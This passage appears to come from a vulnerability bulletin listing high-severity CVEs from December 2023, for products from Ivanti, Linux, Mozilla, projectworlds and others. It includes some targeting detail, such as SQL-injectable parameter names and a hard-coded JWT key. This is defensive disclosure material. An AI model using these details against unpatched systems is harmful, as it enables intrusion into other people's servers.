support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46257
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46258
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46259
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46260
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution.2023-12-199.8CVE-2023-46261
support@hackerone.com
ivanti -- avalancheAn unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve remote code execution.2023-12-199.8CVE-2023-46263
support@hackerone.com
ivanti -- avalancheAn unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve remote code execution.2023-12-199.8CVE-2023-46264
support@hackerone.com
ivanti -- avalancheAn unauthenticated attacker could abuse an XXE vulnerability in the Smart Device Server to leak data or perform a Server-Side Request Forgery (SSRF).2023-12-199.8CVE-2023-46265
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS).2023-12-197.5CVE-2023-46803
support@hackerone.com
ivanti -- avalancheAn attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS).2023-12-197.5CVE-2023-46804
support@hackerone.com
ivanti -- connect_secureA vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance.2023-12-167.5CVE-2023-39340
support@hackerone.com
jetbrains -- teamcityIn JetBrains TeamCity before 2023.11.1 a CSRF on login was possible2023-12-158.8CVE-2023-50870
cve@jetbrains.com
kaifa -- webitr_attendance_systemKaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator's account, to execute login account's permissions, and obtain relevant information.2023-12-159.8CVE-2023-48392
twcert@cert.org.tw
kaifa_technology -- webitr_attendance_systemKaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.2023-12-158.8CVE-2023-48394
twcert@cert.org.tw
kakadu_software_pty_ltd -- kakadu_sdkJPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially-crafted image that is displayed back to the attacker.2023-12-207.5CVE-2023-6562
cve-coordination@google.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'cmbQual' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49677
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDesc' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49678
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTitle' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49679
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTotal' parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49680
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'cmbQual' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49681
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDate' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49682
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDesc' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-219.8CVE-2023-49683
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTitle' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49684
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTime' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49685
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTotal' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49686
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtPass' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49687
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtUser' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49688
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'JobId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49689
help@fluidattacks.com
kashipara_group -- job_portalJob Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'WalkinId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-229.8CVE-2023-49690
help@fluidattacks.com
kashipara_group -- student_information_systemStudent Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'id' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-5007
help@fluidattacks.com
kashipara_group -- student_information_systemStudent Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursecode' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-5010
help@fluidattacks.com
kashipara_group -- student_information_systemStudent Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursename' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.2023-12-209.8CVE-2023-5011
help@fluidattacks.com
kodcloud -- kodboxA vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability.2023-12-169.8CVE-2023-6848
cna@vuldb.com
kodcloud -- kodboxA vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability.2023-12-169.8CVE-2023-6849
cna@vuldb.com
kodcloud -- kodexplorerA vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability.2023-12-169.8CVE-2023-6850
cna@vuldb.com
kodcloud -- kodexplorerA vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219.2023-12-169.8CVE-2023-6851
cna@vuldb.com
kodcloud -- kodexplorerA vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.2023-12-169.8CVE-2023-6852
cna@vuldb.com
kodcloud -- kodexplorerA vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability.2023-12-169.8CVE-2023-6853
cna@vuldb.com
kylinsoft -- hedron-domain-hookA vulnerability was found in KylinSoft hedron-domain-hook up to 3.8.0.12-0k0.5. It has been declared as critical. This vulnerability affects the function init_kcm of the component DBus Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-248578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-217.8CVE-2023-7025
cna@vuldb.com
lfprojects -- mlflowPath Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.2023-12-158.1CVE-2023-6831
security@huntr.dev
linux -- kernelA race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.2023-12-217.8CVE-2023-6546
secalert@redhat.com
linux -- kernelA heap out-of-bounds write vulnerability in the Linux kernel's Performance Events system component can be exploited to achieve local privilege escalation. A perf_event's read_size can overflow, leading to a heap out-of-bounds increment or write in perf_read_group(). We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.2023-12-197.8CVE-2023-6931
cve-coordination@google.com
linux -- kernelA use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation. A race condition can be exploited to cause a timer to be mistakenly registered on an RCU read-locked object which is freed by another thread. We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.2023-12-197.8CVE-2023-6932
cve-coordination@google.com
linux -- linux_kernelA use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_pipapo_walk did not skip inactive elements during set walk, which could lead to double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free. We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.2023-12-187.8CVE-2023-6817
cve-coordination@google.com
m-files_corporation -- m-files_serverLack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.2023-12-207.5CVE-2023-6912
security@m-files.com
majordomo -- majordomoMajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.2023-12-159.8CVE-2023-50917
cve@mitre.org
master_slider -- master_slider_proDeserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro. This issue affects Master Slider Pro: from n/a through 3.6.5.2023-12-207.1CVE-2023-47507
audit@patchstack.com
mindsdb -- mindsdbMindsDB is a SQL Server for artificial intelligence. Prior to version 23.11.4.1, the `put` method in `mindsdb/mindsdb/api/http/namespaces/file.py` does not validate the user-controlled name value, which is used in a temporary file name, which is afterwards opened for writing on lines 122-125, which leads to path injection. Later in the method, the temporary directory is deleted on line 151, but since we can write outside of the directory using the path injection vulnerability, the potentially dangerous file is not deleted. Arbitrary file contents can be written due to `f.write(chunk)` on line 125. MindsDB does check later on line 149 in the `save_file` method in `file-controller.py` which calls the `_handle_source` method in `file_handler.py` if a file is of one of the types `csv`, `json`, `parquet`, `xls`, or `xlsx`. However, since the check happens after the file has already been written, the files will still exist (and will not be removed due to the path injection described earlier), just the `_handle_source` method will return an error. The same user-controlled source is used also in another path injection sink on line 138. This leads to another path injection, which allows an attacker to delete any `zip` or `tar.gz` files on the server.2023-12-229.1CVE-2023-50731
security-advisories@github.com
misp -- mispapp/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs.2023-12-159.8CVE-2023-50918
cve@mitre.org
mlflow -- mlflowPath Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.2023-12-187.5CVE-2023-6909
security@huntr.dev
moxa -- iologik_e1200_seriesA Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user.2023-12-238.8CVE-2023-5961
psirt@moxa.com
mozilla -- firefoxTypedArrays can be fallible and lacked proper exception handling. This could lead to abuse in other APIs which expect TypedArrays to always succeed. This vulnerability affects Firefox < 121.2023-12-198.8CVE-2023-6866
security@mozilla.org
mozilla -- firefoxMemory safety bugs present in Firefox 120. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 121.2023-12-198.8CVE-2023-6873
security@mozilla.org
mozilla -- firefox_esr/thunderbirdA use-after-free was identified in the `nsDNSService::Init`. This issue appears to manifest rarely during start-up. This vulnerability affects Firefox ESR < 115.6 and Thunderbird < 115.6.2023-12-198.8CVE-2023-6862
security@mozilla.org
mozilla -- multiple_productsThe WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6856
security@mozilla.org
mozilla -- multiple_productsFirefox was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6858
security@mozilla.org
mozilla -- multiple_productsA use-after-free condition affected TLS socket creation when under memory pressure. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6859
security@mozilla.org
mozilla -- multiple_productsThe `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6861
security@mozilla.org
mozilla -- multiple_productsThe `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6863
security@mozilla.org
mozilla -- multiple_productsMemory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-198.8CVE-2023-6864
security@mozilla.org
mr-corner -- amazing_little_pollAuthentication bypass vulnerability in Amazing Little Poll affecting versions 1.3 and 1.4. This vulnerability could allow an unauthenticated user to access the admin panel without providing any credentials by simply accessing the "lp_admin.php?adminstep=" parameter.2023-12-209.8CVE-2023-6768
cve-coordination@incibe.es
multisuns -- easylog_web+_firmwareMultisuns EasyLog web+ has a vulnerability of using hard-coded credentials. A remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service.2023-12-159.8CVE-2023-48388
twcert@cert.org.tw
multisuns -- easylog_web+_firmwareMultisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service.2023-12-159.8CVE-2023-48390
twcert@cert.org.tw
multisuns -- easylog_web+_firmwareMultisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2023-12-157.5CVE-2023-48389
twcert@cert.org.tw
navidrome -- navidrome | Navidrome is an open source web-based music collection server and streamer. A security vulnerability has been identified in navidrome's subsonic endpoint, allowing for authentication bypass. This exploit enables unauthorized access to any known account by utilizing a JSON Web Token (JWT) signed with the key "not so secret". The vulnerability can only be exploited on instances that have never been restarted. Navidrome supports an extension to the subsonic authentication scheme, where a JWT can be provided using a `jwt` query parameter instead of the traditional password or token and salt (corresponding to resp. the `p` or `t` and `s` query parameters). This authentication bypass vulnerability potentially affects all instances that don't protect the subsonic endpoint `/rest/`, which is expected to be most instances in a standard deployment, and most instances in the reverse proxy setup too (as the documentation mentions to leave that endpoint unprotected). This issue has been patched in version 0.50.2. | 2023-12-21 | 8.6 | CVE-2023-51442; security-advisories@github.com
netentsec -- application_security_gateway | A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability. | 2023-12-17 | 9.8 | CVE-2023-6903; cna@vuldb.com
netgear -- wnr2000_firmware | A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication. | 2023-12-15 | 9.8 | CVE-2023-50089; cve@mitre.org
nxfilter -- nxfilter | A vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-18 | 9.8 | CVE-2023-6905; cna@vuldb.com
nxfilter -- nxfilter | A vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-17 | 8.8 | CVE-2023-6904; cna@vuldb.com
octokit -- app | octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3. | 2023-12-15 | 7.5 | CVE-2023-50728; security-advisories@github.com
openbsd -- openssh | In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name. | 2023-12-18 | 9.8 | CVE-2023-51385; cve@mitre.org
openimageio -- openimageio | A vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service. | 2023-12-18 | 7.5 | CVE-2023-3430; secalert@redhat.com, nvd@nist.gov
panasonic -- control_fpwin_pro | Stack-based buffer overflow in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. | 2023-12-19 | 7.8 | CVE-2023-6314; product-security@gg.jp.panasonic.com
panasonic -- control_fpwin_pro | Out-of-bounds read vulnerability in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. | 2023-12-19 | 7.8 | CVE-2023-6315; product-security@gg.jp.panasonic.com
peazip -- peazip | A vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release. | 2023-12-17 | 7.8 | CVE-2023-6891; cna@vuldb.com
perl -- perl | A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer. | 2023-12-18 | 7 | CVE-2023-47038; secalert@redhat.com
phz76 -- rtspserver | A vulnerability classified as critical was found in PHZ76 RtspServer 1.0.0. This vulnerability affects the function ParseRequestLine of the file RtspMesaage.cpp. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-17 | 9.8 | CVE-2023-6888; cna@vuldb.com
projectworlds -- online_voting_system_project | Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-48433; help@fluidattacks.com
projectworlds -- online_voting_system_project | Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the reg_action.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-48434; help@fluidattacks.com
projectworlds_pvt._limited -- leave_management_system_project | Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'setearnleave' parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 8.8 | CVE-2023-44481; help@fluidattacks.com
projectworlds_pvt._limited -- leave_management_system_project | Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'setsickleave' parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 8.8 | CVE-2023-44482; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'ch' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45115; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'demail' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45116; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'eid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45117; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'fdid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45118; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'n' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45119; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'qid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45120; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'desc' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45121; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'name' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45122; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'right' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45123; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'tag' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45124; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'time' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45125; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'total' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45126; help@fluidattacks.com
projectworlds_pvt._limited -- online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'wrong' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45127; help@fluidattacks.com
projectworlds_pvt._limited -- online_matrimonial_project | Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'filename' attribute of the 'pic3' multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-46791; help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'psd' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48685; help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'user' parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48686; help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'from' parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48687; help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'to' parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48688; help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'byname' parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48689; help@fluidattacks.com
projectworlds_pvt._limited -- railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'bynum' parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48690; help@fluidattacks.com
projectworlds_pvt._limited -- student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'class_id' parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48716; help@fluidattacks.com
